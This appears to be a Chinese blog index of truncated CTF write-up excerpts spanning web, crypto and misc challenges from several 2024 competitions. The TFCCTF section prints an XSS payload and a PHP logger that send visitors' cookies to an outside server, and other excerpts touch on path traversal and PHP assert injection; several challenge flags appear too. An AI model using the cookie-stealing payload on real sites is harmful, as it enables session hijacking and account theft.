CNSS Summer 2024 WriteUp
Web
🦴 babyHTTP
考点GET POST Cookie,HTTP基础知识
🙋🏼♀️ PHPinfo
考点phpinfo()
http://111.229.23.244:50002/phpinfo.php
ctrl+f,搜索cnss
🥇 我得再快点
利用正则表达式获取前端数据的Key的值,进行md5加密,再Python访问payload
import requestsimport refrom hashlib import md5url = 'http://152.136.11.155:10103'# 循环获取页面内容while True: response = requests.get(url, timeout=1) # 使用正则表达式匹配Key后面的字符串 pattern = r'Key : (\w+)' # 搜索匹配的字符串 match = re.search(pattern, response.text) s = match.group(1) str = md5(s.e ...
第二届煽密杯
也是代表Sloth参加了,学长们没来,去了三个web手,我可以算半个密码手?两个web学弟干瞪眼……
还是太菜了,QWQ,最后放榜,好像排到了98……
爆零了这边,QWQ
明面上去打比赛,实际上去银川旅游(bushi)
初始谜题1
题目
from sympy import Mod, Integerfrom sympy.core.numbers import mod_inverse# 模数N_HEX = "FFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFF7203DF6B21C6052B53BBF40939D54123"MODULUS = Integer(int(N_HEX, 16))MSG_PREFIX = "CryptoCup message:"# 加密函数def encrypt_message(message, key): # 添加前缀 message_with_prefix = MSG_PREFIX + message message_bytes = message_with_prefix.encod ...
羊城杯2024wp
Sloth战队
Rank: 60/588
下面贴我的wp
Web
Lyrics For You
借鉴https://www.cjxol.com/posts/sekaictf-2022-writeup/
/proc/self/cmdline,得到python3-u/usr/etc/app/app.py
../../app/app.py
import osimport randomfrom config.secret_key import secret_codefrom flask import Flask, make_response, request, render_templatefrom cookie import set_cookie, cookie_check, get_cookieimport pickleapp = Flask(__name__)app.secret_key = random.randbytes(16)class UserData: def __init__(self, username): self.username = usern ...
DASCTF2024八月开学季
CHECKIN
8.24
一眼评论区
Crypto
EZsquares
from Crypto.Util.number import *from gmpy2 import *from secret import flagp=getPrime(512)q=getPrime(512)n0=p**2+q**2print('n0 =',n0)e=65537n=p*qm=bytes_to_long(flag)c=pow(m,e,n)print('c =',c)# n0 = 1925737445386391308458687270140759676695136677633159341618496205316835366963761383033206819227820030880945397242381091164164562944724610756685680886882872098988509850246324632519843238887652499502695950456484351920479909405938170869183992124 ...
第四届山石CTF训练营
9号下午(三小时)结束的,第四届山石CTF训练营结营(招新)赛
Misc
签到
公众号
ayyctf{W3lc0me_CTFers_7hIs_1s_yOur_fI4g}
play4fun
二进制8位一组>base64
ayyctf{c0de_1s_funnn!!!}
dog
明显是宽高不对,根据CRC值修复,直接利用自动化工具(懒了)
python Deformed-Image-Restorer.py -i dog.png
自动修复
timestamp
bandzip直接打开,对应flag头ayyctf,时间正好对上了,直接提
s = [97, 121, 121, 99, 116, 102, 123, 52, 49, 101, 49, 45, 98, 101, 99, 54, 45, 101, 102, 97, 49, 57, 125]for i in s: print(chr(i), end='')
ayyctf{41e1-bec6-efa19}
看见公众号说给的那个tx ...
TFCCTF2024&CrewCTF2024
TFCCTF
https://ctf.thefewchosen.com
Web
GREETINGS
一开始感觉可以xss,因为body标签可以用
<body onload=alert(`ls`);>
然后,在vps上放置一个xss.php
<?php$cookie = $_GET['cookie'];$log = fopen("cookie.txt", "a");fwrite($log, $cookie . "\n");fclose($log);?>
<body onload="window.location.href='http://8.138.168.65/xss.php?cookie='+document.cookie">
一试,没鬼用,莫得反应,那就不是xss喽
群里的师傅做出来了,Orz,是pug ssti,一开始也注意到了X-Powered-By: Express,Express是node.js的Web框架的一种,而Express框架 ...
DeadSec CTF2024
比赛网址
https://deadsec.ctf.ae/
Misc
Welcome
Mic check
简单,写个脚本交互100次就行了
from pwn import *p = remote('ip', port)for i in range(100): s = p.recvline() print(s) r = s[12:13+i] print(r) p.sendlineafter(b'submit test words > ', r)p.interactive()
MAN in the middle
可以看到只有上下两个波形,二进制?最后那一段可以忽略不看
但是数据量好大,手动提不现实
010查看16进制,发现FF 7F*44,算一段,01 80*44也算作一段
前者为1,后者为0,解不出来,尝试01为1,10为0
from Crypto.Util.number import *with open("MIM.MP3", 'rb')as f: a ...
DASCTF 2024暑期挑战赛
emmm,就出了一道简单的背包密码,Misc那道图片差第三部分的flag
官方wp,https://www.yuque.com/yuqueyonghu30d1fk/gd2y5h/yleeg03c0ucdoac6
Crypto
complex_enc
超递增背包问题
c = 287687761937146187597379915545639385740275457170939564210821293233370716878150576key = [...]flag = ''for i in key[::-1]: if i <= c: flag += '1' c -= i else: flag += '0'flag = flag[::-1]for i in range(0, len(flag), 8): print(chr(int(flag[i:i+8], 2)), end='')# DASCTF{you_kn0w_b@ckpack ...
ImaginaryCTF2024
Web
readme
下载文件,查看Dockerfile
ictf{path_normalization_to_the_rescue}
journal
if (isset($_GET['file'])) { $file = $_GET['file']; $filepath = './files/' . $file; assert("strpos('$file', '..') === false") or die("Invalid file!"); if (file_exists($filepath)) { include($filepath); } else { echo 'File not found!'; }}
想读一下../../../../../flag,但目录穿越在这里用不了了
可以借助一手assert,把前面 ...
OSCTF2024
HITCON CTF 2024 Quals有点……
不如打OSCTF 2024,比赛网址
https://ctf.os.ftp.sh/
Web
Introspection
script.js
function checkFlag() { const flagInput = document.getElementById('flagInput').value; const result = document.getElementById('result'); const flag = "OSCTF{Cr4zY_In5P3c71On}"; if (flagInput === flag) { result.textContent = "Congratulations! You found the flag!"; result.style.color = "green"; } else ...